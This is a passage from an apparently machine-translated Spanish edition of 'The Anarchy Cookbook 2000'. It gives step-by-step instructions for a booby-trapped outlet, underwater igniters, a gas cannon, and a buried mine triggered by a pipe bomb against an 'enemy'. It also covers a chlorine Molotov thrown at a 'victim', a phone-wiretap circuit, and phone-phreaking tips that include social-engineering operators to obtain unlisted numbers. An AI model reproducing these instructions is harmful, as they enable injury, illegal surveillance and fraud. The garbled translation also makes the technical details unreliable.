6. Re-pegamento de los hilos de nuevo. Insertar en una toma con frecuencia utilizada por la víctima y obtener el infierno fuera!

Cuando la víctima acciona el interruptor, que se encontrará con una gran sorpresa!

29. En virtud de encendedores de agua por parte de The Jolly Roger

Materiales necesarios:

• Pack de 10 diodos de silicio. (Disponible en Radio Shack. Usted sabe que usted consiguió las correctas si son objetos de vidrio muy, muy pequeñas!)

• Caja de cerillas

Page 25: 106652012 the Anarchy Cookbook 2000 Es

• 1 vela

Procedimiento:

1. Encienda la vela y permitir que un grupo de cera fundida para formar en la parte superior.

2. Tome un solo partido y mantener la parte de vidrio de un solo diodo contra la cabeza. Doblar las patas del diodo alrededor de la matchhead modo que uno envolturas en una dirección ascendente y, a continuación sobresale a un lado. Hacer lo mismo con el otro cable, pero en una dirección descendente. Los diodos ahora debe ser pegado a la matchhead, pero sus cables no deben tocarse!

3. Sumerja el matchhead en cera para darle un abrigo a prueba de agua. Estos trabajos bajo el agua

4. Repita el procedimiento para hacer tantas como quieras.

¿Cómo usarlos:

Cuando estos tipos pequeños están conectados a través de una batería de 6V, el diodo alcanza lo que se llama tensión de ruptura. Cuando los componentes eléctricos llegan a la mayoría de este voltaje, por lo general producen grandes cantidades de calor y la luz, mientras que derretimiento en una masa pequeña. Este calor es suficiente para encender una matchhead. Estos se recomiendan para uso bajo el agua, donde la mayoría de los encendedores de otros se niegan a trabajar.

30. Home-brew cañonazo por The Jolly Roger

Materiales necesarios:

• Un tubo de drenaje de plástico, 3 pies de largo, por lo menos 3 ½ pulgadas de diámetro.

• Un tubo más pequeño de plástico, cerca de 6 pulgadas de largo, 2 pulgadas de diámetro.

• 1 más ligero, con grandes rellenos de líquido (esto se traga!)• Un tubo de la tapa para encajar el tubo grande, 1 casquillo de la pipa para encajar

el tubo pequeño.• 5 pies de bellwire.• Un interruptor SPST.• 16v polaroid pozo-a-pulso de la batería.• Relé de 15v (conseguir esto en Radio Shack).• Cinta eléctrica.• Una tarde libre.

Procedimiento:

• Cortar el cable del timbre en tres partes iguales, y despojar a los extremos.

• Corte un agujero en el lado del tubo grande, el mismo diámetro que el tubo pequeño. Pase el agujero y un extremo de la tubería pequeña. Ellos deben atornillar fácilmente.

• Tome un pedazo de chatarra, y doblar en una "L", a continuación, conectar con el nivel en el más ligero:

/ ------------------------ Cambio de gas está aquí V / ------! Claro! <--- Palanca de metal!

Page 26: 106652012 the Anarchy Cookbook 2000 Es

• Ahora, cada vez que tire del "disparador" de gas debe fluir libremente desde el encendedor. Puede que tenga que ampliar la "conexión de gas" en su más claro, si usted desea ser capaz de disparar más rápido.

• Conecte dos cables a los dos mensajes sobre el interruptor.

• Cortar dos agujeros en el lado del tubo más pequeño, uno para el interruptor en la parte inferior, y una para la pieza de metal en la parte superior. A continuación, montar el interruptor en la parte inferior, corriendo los cables hacia arriba y fuera de la parte superior.

• Montar el más claro / gatillo en la parte superior. Ahora, el interruptor se debe mover con facilidad, y el gatillo debe hacer que el más ligero para derramar gas. Vuelva a enroscar el tubo más pequeño en el más grande, mantenga pulsado el gatillo un poco, dejarlo ir, y lanzar un partido allí. Si todo va bien, usted debe oír "THUD! 'Una grande y bonita

• Obtener una bodega del relé, y quitar la parte superior.

1 ---------------v /2 -------------- / <- el objeto del centro es el dedo de metal dentro del relé 3------------- cc /oo ---------------- 4iill ---------------- 5

• Conectar (1) a uno de los cables procedentes del interruptor. Conectar (2) a (4), y de conexión (5) a un lado de la batería. Conectar el cable restante del interruptor al otro lado de la batería. Ahora usted debería ser capaz de obtener el relé para hacer un poco de "zumbido" de sonido cuando se activa el interruptor y usted debería ver algunas chispas diminutas.

• Ahora, cuidadosamente montar el relé en el interior del tubo grande, hacia la parte posterior. Tornillo en el tubo más pequeño, la cinta de la batería en el lado del cañón cañón (sí, pero no lo son todo aspecto!)

• Ahora debería ser capaz de dejar un poco de gas en el cilindro y lo puso fuera al pulsar el interruptor.

• Ponga la tapa en la parte final de la tubería de gran manera muy segura. Ahora está listo para el primer ensayo de gestión!

Para probar:

Pon algo muy, muy grande en el barril, sólo para que se ajuste "correcto". Ahora, encontrar un hombre fuerte (el retroceso probablemente le toco el culo si no tienes cuidado!). Ponga en un shoulderpad, orejeras, y posiblemente alguna otra ropa de protección (confiar en el Jolly Roger! Usted va a necesitar!). Sostenga elactivar durante 30 segundos, agárrate fuerte, y pulsa el interruptor. Con suerte y los ajustes apropiados, usted debería ser capaz de poner una naranja congelado a través de ¼ o de madera contrachapada de 25 pies.

31. Química lista de equivalencia por la Jolly Roger

Acacia ................................................. La goma arábiga ...............Ácido Acético ................................................ Vinagre ..............Óxido de aluminio ................................................ Alumia ............

Page 27: 106652012 the Anarchy Cookbook 2000 Es

Sulfato de aluminio potásico ............................................... alumbre ..Sulfato de aluminio ................................................ Alum ............Carbonato de amonio ................................................ Hartshorn .....Hidróxido de amonio ................................................ El amoníaco .......Nitrato de Amonio ................................................ La sal ...... PedroAmonio Oleato ................................................ Jabón de amoníaco .....Amylacetate ................................................. Plátano de aceite ..........El sulfuro de bario ................................................ ......... Negro cenizaCarbono Carbinate ................................................ Tiza ...........Tetracloruro de carbono líquido de limpieza ...............................................Hipoclorito de calcio ............................................ polvo de blanqueoÓxido de calcio ................................................ Lima ...............Sulfato de calcio ................................................ . Yeso de ParísÁcido Carbónico ................................................ Seltzer ............Cetyltrimethylammoniumbromide ...................................... sal de amonioEthylinedichloride ................................................. Fluido holandesa ..Óxido de hierro ................................................ óxido de hierro ...........Furfural ................................................. aceite de salvado .........La glucosa ................................................. Jarabe de maíz ..............Grafito ................................................. ............ lápizÁcido Clorhídrico ................................................ Ácido muriático ..Peróxido de hidrógeno ................................................ Peróxido de .......De acetato de plomo ................................................ ....... azúcar de plomoTero plomo-óxido de .............................................. El plomo rojo ...........Silicato de magnesio ................................................ El talco ..........Sulfato de magnesio ................................................ ..... sal de EpsomSalicilato de metilo ................................................ Invierno Verde del AceiteEl naftaleno ................................................. Las bolas de naftalina ...........El fenol ................................................. ácido carbólico ............Bicarbonato de Potasio ............................................ crema tártaraSulfato de cromo potasio ............................................ ChromealumNitrato de potasio ................................................ Sal ..... PedroÓxido de sodio ................................................ Arena ................Bicarbonato de Sodio ................................................ Bicarbonato de sodio ...Borato sódico ................................................ Borax ..............Carbonato de Sodio ................................................ La sosa ....Cloruro de Sodio ................................................ Sal .............Hidróxido de Sodio ................................................ Lye .............Silicato de sodio ................................................ Vidrio ............Sulfato de Sodio ................................................ .... sal de GlauberTiosulfato de sodio ........................................... Hipo del fotógrafoÁcido sulfúrico ................................................ .......Batería ÁcidoSacarosa ................................................. .............. Caña de AzúcarEl cloruro de zinc ................................................ Fluido ..... TinnerSulfato de zinc ................................................ Vitriolo blanco .......

Page 28: 106652012 the Anarchy Cookbook 2000 Es

32. Escuchas telefónicas por parte de The Jolly Roger

Aquí hay alguna información sobre escuchas telefónicas. En este archivo es un esquema para una intervención telefónica simple y las instrucciones para conectar un grabador de cinta de relé de control a la línea telefónica.

En primer lugar, me referiré a los grifos un poco. Hay muchos tipos diferentes de grifos. Hay transmisores por cable, grifos y grifos de inducción para nombrar unos pocos. Con conexión de cable y transmisores inalámbricos deben estar conectados físicamente a la línea antes de que se va a hacer ningún bien. Una vez que un grifo inalámbrica está conectado a la línea, se puede transmitir todas las conversaciones sobre un rango de recepción limitada. Los teléfonos de la casa, incluso puede ser modifica para recoger las conversaciones en la sala y las transmiten también! Estos grifos son por lo general apagado de la línea telefónica, pero puede tener una fuente de alimentación externa. Usted puede obtener más información sobre estos grifos por conseguir un tema de la comunicación popular y la lectura a través de los anuncios. Grifos cable, por otro lado, necesita ninguna fuente de energía, pero un cable se debe ejecutar desde la línea para el oyente o para un transmisor. Hay ventajas obvias de los grifos inalámbrica a través de los cables. Hay un tipo de llave inalámbrica que se parece a un micrófono normal de teléfono. Todo lo que tienes que hacer es reemplazar el original con este micrófono y transmitirá todas las conversaciones! También hay un tipo exótico de grifo por cable conocido como el "transmisor Infinity 'o' Bug Armónica '. Con el fin de conectar uno de estos, se debe instalar en el interior del teléfono. Cuando alguien llama al teléfono intervenido y * antes * de que suena y hace sonar un silbato en la línea, el transmisor toma el teléfono a través de un relé. El micrófono en el teléfono se activa para que la persona que llama puede escuchar todas las conversaciones en la habitación. Hay un tono de prueba de barrido en 415/BUG-1111 que se puede utilizar para detectar uno de estos grifos. Si uno de ellos es en su línea y la prueba # envía el tono correcto, se oye un clic. Grifos de inducción tienen una gran ventaja sobre los grifos que deben estar físicamente conectados al teléfono. Ellos no tienen que estar en contacto con el teléfono con el fin de recoger la conversación. Ellos trabajan en el mismo principio que las pequeñas ventosas micrófonos de cinta de la grabadora que usted puede conseguir en Radio Shack. Micros de inducción puede ser conectado a un transmisor o por cable se.

He aquí un ejemplo de espionaje industrial mediante el teléfono:

Un vendedor entra en una oficina y hace una llamada telefónica. Él falsifica la conversación, pero cuando se cuelga se desliza unos cubos de goma espuma en la base. La parte llamada todavía puede oír todas las conversaciones en la habitación. Cuando alguien coge el teléfono, los cubos caen desapercibidos.

Un grifo que también se puede utilizar en un teléfono para oír lo que su módem está haciendo cuando está marcado por la guerra, la piratería, o simplemente llamar a un BBS.

Aquí está el esquema:-------!) ----)! (-------------> !) ( Cap ^)! ( !) ( !) ( !) ( ^ ^ ^ ^ ^ ---)! (-------------> ^ 100K ! ! <Entrada

El bote de 100K se utiliza para el volumen. Debe estar en su nivel más alto (menor resistencia) establecer si conectar un altavoz a través de la salida. pero se debe establecer en su mayor resistencia en una grabadora o un amplificador. Usted puede encontrar que es necesario añadir otros 10 - 40K. El condensador debe estar alrededor de 0,47 MFD. Es único propósito es evitar que el relé en el móvil se dispare y pensar

Page 29: 106652012 the Anarchy Cookbook 2000 Es

que usted tiene el telefono del gancho. el transformador de salida de audio está disponible en Radio Shack. (Parte # 273-138E para la entrada). El rojo y los cables blancos van hacia el dispositivo de salida. Es posible que desee experimentar con el transformador para la mejor salida. Conexión de un relé de la grabadora es fácil. Sólo conectar uno de los cables de teléfono (normalmente rojo) al final de una del relé y el otro extremo sólo bucle alrededor. Esto deja de lado. Se debe tener este aspecto:

------ ^ ^ ^ ^ ^ ^ ^ ^ ^ ------------ --------- RELAY ^ ^(Parte # 275-004 de Radio Shack funciona bien)

Si usted cree que la línea está intervenida, lo primero que debe hacer es inspeccionar físicamente la línea de usted, especialmente los teléfonos. Usted puede obtener reemplazos de mike con detectores de errores construido adentro Sin embargo, yo no confío en ellos demasiado. Es demasiado fácil para obtener una lectura equivocada.

Para más información:

FALLOS y la vigilancia electrónica de Publicaciones del desierto CÓMO EVITAR escuchas electrónicas y invasión de privacidad. No recuerdo que esta es de ... es posible que desee para tratar de Paladin Press.

33. Cómo hacer que una mina por la Jolly Roger

En primer lugar, usted necesita para obtener un interruptor de botón. Tome los cables de la misma y conectar uno a un conector de batería de nueve voltios y el otro a un encendedor solar (utilizada para el lanzamiento de cohetes a escala). Una pieza muy fina de alambre de equipo de música por lo general va a hacer el truco si estás desesperado, pero yo recomiendo el encendedor. Conectar el otro cable de la batería de nueve voltios a un extremo del interruptor. Conectar un cable desde el interruptor en la otra punta en el encendedor solar.

interruptor de la batería ----------- \ / \ / \ / \ / encendedor solar | | | explosivo

A continuación, conecte el explosivo (bomba de tubo, m-80, CO ² bomba, etc) en el encendedor adjuntando el fusible para el encendedor (sellarlo con cinta adhesiva). Ahora cavar un hoyo, no muy profundo, pero lo suficiente para cubrir todos los materiales. Piense en lo que la dirección de su enemigo vendrá de la planta y el interruptor, pero deja el botón sea visible (no muy visible). Plantar el explosivo a unos 3-5 metros de distancia desde el interruptor, ya que habrá un retraso en la explosión que depende de lo corta que es la mecha, y, si es una mecha casera se está utilizando, su velocidad de grabación. Pero si las cosas bien ... y su enemigo es lo suficientemente cerca ......... BBBBBBBOOOOOOOOOOOOOOOOOOOOOOOOMMMM!

34. Un tipo diferente de cóctel Molitov por The Jolly Roger

Aquí está cómo hacerlo:

1. Consigue una botella de gaseosa y llenarlo con gasolina hasta la mitad.

Page 30: 106652012 the Anarchy Cookbook 2000 Es

2. Meter un pedazo de tela en el cuello de una manera linda y apretada.

3. Obtener una pastilla de cloro y cosas que en ese país. Usted va a tener que forzar debido a que las tabletas son más grandes que la abertura de la botella.

4. Ahora busca una víctima adecuada y el ala que en su dirección. Cuando se golpea el pavimento o cualquier otra superficie dura lo suficiente como para romper, y la mezcla de cloro y de la gasolina ..... BOOM!!

35. Sistemas de Teléfono Tutorial de El Jolly Roger

Para empezar, vamos a discutir los procedimientos de marcación para el hogar, así como de marcación internacional. También vamos a echar un vistazo a el plan de numeración telefónica.

América del Norte Plan de Numeración

En América del Norte, El plan de numeración telefónica es el siguiente:

• 3 Plan de Numeración dígitos de área (NPA) de código, es decir, el código de área• Número telefónico de 7 dígitos que consiste en un 3 dígitos Oficina central (CO),

más un número de código de 4 dígitos estación de

Estos 10 dígitos se llama la dirección de red o el código de destino. Es en el formato de:

Área de Teléfono Código # --------------------

N * X NXX-XXXX

Donde: N = un dígito 2 a 9 * = El dígito 0 o 1 X = un dígito 0 a 9

Códigos de área

Busque en su guía telefónica o la lista por separado de los códigos de área que se encuentran en muchas BBS. Estos son los códigos de áreas especiales (SAC):

510 - TWX (EE.UU.) 610 - TWX (Canadá) 700 - Nuevo Servicio 710 - TWX (EE.UU.) 800 - WATS 810 - TWX (EE.UU.) 900 - DIAL-Servicios de TI 910 - TWX (EE.UU.)

Los otros códigos de área nunca se cruzan las líneas estatales, por lo tanto, cada estado debe tener al menos un exclusivo código de NPA. Cuando una comunidad está dividida por una línea de estado, los números de CO son a menudo intercambiables (es decir, puede marcar el mismo número a partir de dos diferentes códigos de área).

TWX (Telex II) consta de 5 códigos de área escritor de teletipos. Ellos son propiedad Western Union. Se trata del SAC sólo podrá alcanzarse a través de máquinas TWX otros. Estas van a 110 baudios (última vez que revisé! Lo más probable es más rápido ahora). Además de los números de TWX, estas máquinas se dirigen a los números de teléfono normales. Máquinas TWX siempre responde con un Respuesta automática. Por ejemplo, su información de WU TWX # es (910) 279-5956. La Contestación de este servicio es "WU MAWA FYI".

Page 31: 106652012 the Anarchy Cookbook 2000 Es

Si no desea que una máquina TWX, puede enviar mensajes de TWX con EasyLink [800/325-4112]. Sin embargo, usted se va a tener que abrirse paso en este!

700:

700 es utilizado actualmente por AT & T como un servicio de reenvío de llamadas. Está dirigido a vendedores en la carrera. Para entender cómo funciona esto, lo voy a explicar con un ejemplo. Digamos que Joe P. Salespig trabaja para AT & T de seguridad y que es a la carrera persiguiendo a un Phreak todo el país que estropeado tremendamente importante del sistema COSMOS. Digamos que 700 de Joe # es (700) 382-5968. Cada Joe el tiempo pasa a un nuevo hotel (o motel SLEAZY más probable), él marca un especial de 700 #, introduce un código y el número donde se hospeda. Ahora bien, si su jefe recibió alguna información importante, lo único que haría es marcado (700) 382-5968 y sonaba siempre que sea Joe última programado para. Atractivo, ¿eh?

800:

Este saco es una de mis favoritas, ya que permite llamadas gratuitas. WATS perfeccionamiento activo (INWATS), o hacia el interior de área amplia de servicios de telecomunicaciones son los números 800 que todos conocemos. 800 números se establecen en las áreas de servicio o bandas. Hay 6 de ellos. Banda 6 es el más grande y usted puede llamar a una banda de 6 # desde cualquier parte del EE.UU. excepto el estado en que se termine la llamada (es por eso que la mayoría de las empresas tienen un número 800 para el país y luego otro para su estado.) Banda 5 incluye los 48 estados contiguos. Todo el camino hasta la banda 1 que incluye sólo los estados contiguos a esa pregunta. Por lo tanto, menos gente puede llegar a un número de la banda 1 INWATS que una banda de 6 números.

INWATS interestatal # 's (es decir, se puede llamar desde sólo 1 estado) siempre tienen un 2 como último dígito en el intercambio (es decir, 800-NX2-XXXX). El NXX en 800 números representan el área donde se encuentra el negocio. Por ejemplo, un número comenzando con 800-431 sería terminar en un CO NY

800 números siempre terminan en una serie de caza en un CO Esto significa que se trata del primer número asignado a la empresa por sus 800 líneas, y si este está ocupado, intentará el próximo número, etc, debe tener un mínimo de 2 líneas por cada 800. Por ejemplo, utiliza una serie Travelnet caza. Si marca (800) 521-8400, se intentará en primer lugar el número asociado con el 8400, y si está ocupado irá a la siguiente puerto disponible, etc INWATS clientes son facturados por el número de horas de las llamadas realizadas a su número .

OUTWATS (WATS AFUERA): OUTWATS para hacer las llamadas salientes. Las grandes empresas utilizan OUTWATS ya que reciben a granel tasa de descuento. Puesto que los números OUTWATS no puede tener llamadas entrantes, están en el formato de:

(800) * XXX-XXXX

Donde * es el dígito 0 ó 1 (o incluso puede ser designado por una letra) que no se puede marcar a menos que la caja de llamada. El XX * identifica el tipo de servicio y las áreas que la empresa puede llamar.

Recuerde:

INWATS + OUTWATS = WATS EXTENDER

900:

Este SAC DIAL-IT es un programa nacional de acceso telefónico es servicio. Es el uso para la toma de encuestas de televisión y otras cosas. El primer minuto cuesta actualmente un escandaloso 50-85 centavos y cada minuto adicional cuesta 35-85 centavos de dólar. Él va a tomar en una gran cantidad de ingresos de esta manera!

Marque (900) 555-1212 para averiguar lo que está actualmente en este servicio.

Page 32: 106652012 the Anarchy Cookbook 2000 Es

CÓDIGOS DE CO

Identifican la conmutación de la oficina donde la llamada se va a encaminar. Los códigos de CO siguientes se reservan a nivel nacional:

555 - asistencia de directorio 844 - tiempo. Estos son ahora en! 936 - el clima de cambio 976 950 - servicios en el futuro 958 - planta de prueba 959 - planta de prueba 970 - prueba de la planta (temporal) 976 - Sintonía de servicios de TI

Además, el 3 dígitos ANI y de devolución de llamada # 's son considerados como prueba de la planta y por lo tanto están reservados. Estas cifras varían de una zona a otra.

No se puede marcar un 0 o 1 como el primer dígito del código de cambio (a menos que use una caja azul!). Esto se debe al hecho de que estos intercambios (000-199) contiene todo tipo de mierda interesantes, como la conferencia # 's, los operadores, la prueba de #' s, etc

950:

Estos son los servicios que se utilizan actualmente por el cambio de 950:

1000 - SPC 1022 - MCI Execunet 1033 - EE.UU. Teléfono 1044 - Allnet 1066 - Lexitel 1088 - SBS Skyline

Se trata de SCC (Specialized Carriers comunes) están libres de los teléfonos fortaleza! Además, el intercambio de 950, probablemente será eliminado con la introducción de la igualdad de acceso.

Las pruebas de la planta:

Estos incluyen ANI, llamadas entrantes, y otras varias pruebas.

976:

Marque el 976-1000 para ver lo que está actualmente en el servicio. Además, BBS muchas personas tienen listados de estos números.

N11 códigos:----------Campana está tratando de eliminar algunos de ellos, pero todavía existen en la mayoría de las áreas.

011 - prefijo de marcación internacional 211 - operador de moneda de reembolso 411 - asistencia de directorio 611 - servicio de reparación 811 - oficina de negocios 911 - DE EMERGENCIA

Para llamadas internacionales

Page 33: 106652012 the Anarchy Cookbook 2000 Es

Con marcado internacional, el mundo se ha dividido en 9 zonas de numeración. Para hacer una llamada internacional, primero debe marcar: Prefijo internacional + código del país + número nacional.

En América del Norte, El prefijo internacional es 011 para las llamadas de estación a estación. Si usted puede marcar los números internacionales directamente en su área, entonces usted tiene Discado Internacional Directo a Distancia (IDDD).

El código de país, que varía de 1 a 3 dígitos, siempre tiene la zona del mundo de numeración como el primer dígito. Por ejemplo, el código de país para el Reino Unido es de 44, por lo que es en el mundo de numeración de la zona 4. Algunas tarjetas pueden contener una lista completa de los códigos de otros países, pero aquí te doy algunos ejemplos:

1 - América del Norte (EE.UU., Canadá, etc) 20 - Egipto 258 - Mozambique 34 - España 49 - Alemania 52 - México (Parte sur) 7 - URSS 81 - Japón 98 - Irán (Llamadas y sin problemas esos hijos de puta!)

Si llama desde un área que no sea América del Norte, El formato es generalmente el mismo. Por ejemplo, digamos que usted quiere llamar a la Casa Blanca desde Suiza a decirle al presidente que su cuenta bancaria numerada es exagerado (que pasa, ¿sabes?). En primer lugar, tendría que marcar 00 (prefijo internacional de la SWISS marcación), entonces 1 (el EE.UU. el código de país), seguido por 202-456-1414 (elnúmero nacional de la Casa Blanca. Sólo pregunte por Georgy y darle la mala noticia!)

Además, el código del país 87 está reservado para servicio móvil marítimo, es decir, buques que hacen escala:

871 - Marisat (Atlántico) 871 - Marisat (Pacífico) 872 - Marisat (India)

Internacional de conmutación:------------------------

En América del Norte en la actualidad hay siete que no. 4 ESS que cumplir el deber de ISC (Inter-nación centrales de conmutación). Todas las llamadas internacionales de numeración de la zona 1 se enrutan a través de uno de estos "puntos de salida". Ellos son:

182 - White Plains,Nueva York 183 - Nueva York,Nueva York 184 - Pittsburgh,Pensilvania 185 - Orlando, Fl. 186 - Oakland,California 187 - Denver,CO 188 - Nueva York,Nueva York

La serie 18X son los códigos de operador de enrutamiento de acceso en el extranjero (para ser discutido con las cajas azules). Todas las llamadas internacionales a utilizar un servicio de señalización llamada CCITT. Se trata de una norma internacional para la señalización.

OK .. hay que ir por ahora! Si desea leer más sobre esto, lea la segunda parte que es el siguiente archivo # 36 en el libro de cocina Jolly Roger!

Page 34: 106652012 the Anarchy Cookbook 2000 Es

36. Sistemas de Teléfono Tutorial de la parte II de The Jolly Roger

Parte II se ocupará de los distintos tipos de operadores, la jerarquía y de oficina, equipos de conmutación.

Operadores

Hay muchos tipos de operadores en la red y los más comunes serán discutidas.

TSPS Operador:

Los TSPS [(Servicio de Tráfico Position System) en oposición a este servicio telefónico de mierda] operador es probablemente la perra (o hijo de puta, para los partidarios de la liberación femenina por ahí) que la mayoría de nosotros estamos acostumbrados a tener que lidiar con. Estas son sus responsabilidades:

1. La obtención de información de facturación de tarjeta de llamadas o las llamadas tercer número

2. Identificando llamada del cliente en las llamadas de persona a persona.

3. La obtención de la aceptación de los cargos de llamadas de cobro revertido.

4. La identificación de números de llamada. Esto sólo ocurre cuando el número de llamada no se registra automáticamente por el CAMA (Contabilidad centralizada automática de mensajes) y enviado desde la oficina local. Esto podría ser causado por fallas en los equipos (ANIF-automático a falta de Número de Identificación) o si la oficina no está equipado para CAMA (ONI-Número de identificación del operador).

Una vez tuve una falla en el equipo pasar a mí y al operador TSPS se adelantó y dijo: "¿A qué número está llamando?" Por curiosidad, le di el número a mis compañeros, me dio las gracias y entonces yo estaba conectado a una conversación que parecía ser entre un hombre y marco de su esposa. Entonces comenzó a sonar el partido que quería llamar inicialmente y todo el mundo phreaked a cabo (con perdón del juego de palabras). De inmediato cayó esta conferencia de dos líneas!

Usted no debe meterse con el operador TSPS ya que sabe que el número que está llamando. Su número se mostrará en un LED de 10 dígitos de lectura (tablero ANI). También sabe si usted está en un teléfono de la fortaleza y que puede rastrear las llamadas muy fácilmente! Fuera de todos los operadores, que es uno de los más peligrosos.

Operador INTERIOR:

Este operador le ayuda en sus TSPS locales ("0") que operan las llamadas de conexión. Ella nunca va a cuestionar una llamada, siempre y cuando la llamada está dentro de SU ÁREA DE SERVICIO. Ella sólo se puede acceder a través de otros operadores o mediante una caja azul. Desde una caja azul, que tendría que marcar PK 121 + NPA + ST para el operador interno que le ayudará a conectar las llamadas dentro de ese Plan Nacional de Acción solamente. (Azul boxeo se discutirá en un archivo de futuro).

DIRECTORIO DE ASISTENCIA Operador:

Este es el operador que está conectado a al marcar: 411 o NPA-555-1212. Ella no fácil saber dónde usted está llamando. Ella no tiene acceso a los números no cotizan en bolsa, pero ella no sabe si uno no cotizan en bolsa # existe para obtener una lista determinada.

También hay un operador de asistencia de directorio para las personas sordas que utilizan teletipos. Si el módem puede transferir BAUDOT [(45 ½ de transmisión). Un módem que yo sepa que hacer esto es la acústica del gato de Apple o el Atari 830 módem acústico. Sí sé que son difíciles de encontrar ... pero si quieres hacer esto .. mire a su alrededor!), entonces usted puede llamar a él / ella y tener una conversación

Page 35: 106652012 the Anarchy Cookbook 2000 Es

interesante. El número es: 800-855-1155. Ellos usan las abreviaturas télex estándar, tales como GA para seguir adelante. tienden a ser más amable y hablar más de sus operadores regulares. Además, son más vulnerables en que se habla de información a través del proceso de "ingeniería social" como catalizador de Chesire lo pondría.

Desafortunadamente, no tienen acceso a gran parte. Una vez bullshitted con uno de estos operadores de un tiempo atrás y me di cuenta que hay 2 oficinas de este tipo de DA que se encargan de TTY. Uno está en Filadelfia y el otro está en California. Tienen aprox. 7 operadores de cada uno. La mayoría de los operadores de TTY deben pensar que su trabajo esaburrido (sobre la base de un funcionario "encuesta BIOC"). Ellos también sienten que están sub-pagados. De hecho llamar a un regular número de DA para procesar su solicitud (lo siento, no hay equipos de lujo!)

Otros operadores tienen acceso a su propia DA llamando al PK 131 + NPA + ST (MF).

CN / A los operadores:

NC / A Los operadores son los operadores que hacen exactamente lo contrario de lo que los operadores de asistencia de directorio son para. En mi experiencia, estos operadores saben más que el de DA op y no son más susceptibles a la "ingeniería social". Es posible una mierda NC / operador A para el número de NO-PUB DA (es decir, se le da el nombre y te dan el número no listado. Ver el artículo sobre los números no cotizan en bolsa en este libro de cocina para obtener más información acerca de ellos.). Esto se debe al hecho de que dan por sentado que usted es un empleado de la compañía del compañero. Por desgracia, la desintegración de AT & T ha dado lugar a la ruptura de un número DA pocos NO PUB y cambios de política en NC / A.

INTERCEPT Operador:

El operador de intersección es la que está conectado a cuando no hay suficientes grabaciones a disposición de decir que el número ha sido desconectado o cambiado. Por lo general, dice, "¿Qué número te está llamando?" con un acento extranjero. Esta es la forma de vida más bajo del operador. A pesar de que no sé de dónde usted está llamando, es una pérdida o de su tiempo para tratar de abusar de ellos verbalmente, ya que suelen entender muy poco de Inglés de todos modos.

Dicho sea de paso, un área de unos pocos TIENE inteligentes Operadores INTERCEPT.

Otros operadores:

Y luego están los: Móvil, Buque-tierra, de la Conferencia, Marina Verify ", salir de Word y vuelva a llamar", Ruta y un precio (PK 800 + 141 1212 ST), y otros operadores especiales que tienen una finalidad u otra en la red.

Problemas con el operador:

Pida hablar con su supervisor ... o mejor aún, el Jefe de Grupo (que es el funcionario de mayor rango en cualquier oficina), que es el equivalente de la señora en una casa de putas.

Por cierto, algunos de monóxido de carbono que le permitirá marcar un 0 o 1 como el cuarto dígito, también le permitirá llamar a los operadores especiales y Tel diversión. Co. números sin una caja azul. Esto es muy raro, sin embargo! Por ejemplo, 212-121-1111 te llevará un operador de Nueva York hacia el interior.

Oficina de Jerarquía

Todas las oficinas de cambio en el América del Norte (El sistema NPA), se le asigna un nombre de la oficina y de clase. Hay cinco clases de las oficinas numeradas del 1 al 5. El CO es más probable que una oficina de la clase 5 o al final. Todos los de larga distancia (peaje) las llamadas son conmutadas por una oficina de peaje que puede ser una clase de 4, 3, 2, o en la oficina 1. También hay una oficina clase 4X llamado un

Page 36: 106652012 the Anarchy Cookbook 2000 Es

punto intermedio. La oficina 4X es un uno digital que puede tener un intercambio desatendida unido a él (conocido como una unidad de conmutación remota (RSU)).

La siguiente tabla lista la Oficina #, nombre, y cómo muchos de los que existe la oficina (a lo mejor de mi conocimiento) en América del Norte:

Clase Nombre Abb Número existentes1 Regional Centro RC 122 Centro Seccional SC 673 Primario Centro PC 2304 Peaje Centro TC 13004P Línea Punto TP N / A4X Punto intermedio IP N / A5 Fin de la Oficina EO 19.0006 RSU RSU N / A

Cuando se conecta una llamada de un partido a otro, el equipo de conmutación, por lo general trata de encontrar la ruta más corta entre la oficina de fin de la clase 5 de la persona que llama y la clase 5 oficina central de la parte llamada. Si los troncos de ninguna oficina inter-existen entre las dos partes, entonces se moverá hacia arriba a la oficina más próxima de las llamadas de servicio (clase 4). Si la clase 4 la oficina no puede manejar la llamada mediante el envío a otra clase 4 o 5 oficinas, que será enviada a la oficina más próxima en la jerarquía (3). El equipo de conmutación, primero utiliza los grupos de entre oficinas de alto uso de tronco, si están ocupados, entonces va a la final, los grupos de troncales en el siguiente nivel más alto. Si la llamada no puede ser conectado, es probable que obtener un nuevo orden [120 IPM (interrupciones por minuto) ocupada de la señal] de la señal. En este momento, los chicos de Operaciones de la Red probablemente se cagaba en los pantalones, y tratando de evitar la temida Dreadlock red (como se ve en la tele!).

También es interesante notar que 9 conexiones en paralelo se llama anillo alrededor del color de rosa-y nunca ha ocurrido en la historia de teléfono. Esto provocaría una conexión de bucle sin fin [de una manera ordenada para atornillar realmente depende de la red].

Los 10 centros regionales en el EE.UU. Y el 2 en Canadá están todos interconectados. que constituyen el fundamento de toda la red telefónica. Dado que hay sólo 12 de ellos, se enumeran a continuación:

Clase 1 Ubicación de la Oficina Regional Plan Nacional de AcciónDallas 4 ESS 214Wayne,Pensilvania 215Denver 4T 303Regina N º 2SP1-4W (Canadá) 306San Luis 4T 314Rockdale,Georgia 404Pittsburgh 4E 412Montreal N º 1 (4AETSCanadá) 504

37. Básico Alianza Teleconferencia por The Jolly Roger

Introducción:Este phile se ocupará de acceder, comprender y utilizar los sistemas de teleconferencia de la Alianza. Tiene muchas secciones y para el mejor uso debe ser impreso.

Alianza:Teleconferencia Alliance es una empresa independiente que permite al público en general para acceder y utilizar su equipo de la comunicación. Muchos rumores han estado flotando alrededor de ese Alianza es una subsidiaria de AT & T. Bueno, ellos están equivocados. Como se indicó anteriormente, Alianza es una empresa totalmente independiente. Ellos usan equipos sofisticados para permitir a los usuarios hablar con muchas personas a la vez.

Page 37: 106652012 the Anarchy Cookbook 2000 Es

El Número:Alianza es en el intercambio de 700, por lo que no se localiza, bueno, no de una manera. Alianza Sólo en ciertos estados, y sólo los residentes de estos estados pueden tener acceso a ciertos marcando directo. Esto, sin embargo, se discutirá en un capítulo posterior. Los números de alianza son los siguientes:

0-700-456-1000 (Chicago)-1001 (Los Ángeles)-1002 (Chicago)-1003 (Houston)-2000 (?)-2001 (?)-2002 (?)-2003 (?)-3000 (?)-3001 (?)-3002 (?)-3003 (?)

Las ubicaciones de los primeros 4 números se conocen y les he indicado. Sin embargo, los números en la 200x y 300x no se conoce definitivamente. Se rumorea que el patrón se repite, pero esto no ha sido comprobada.

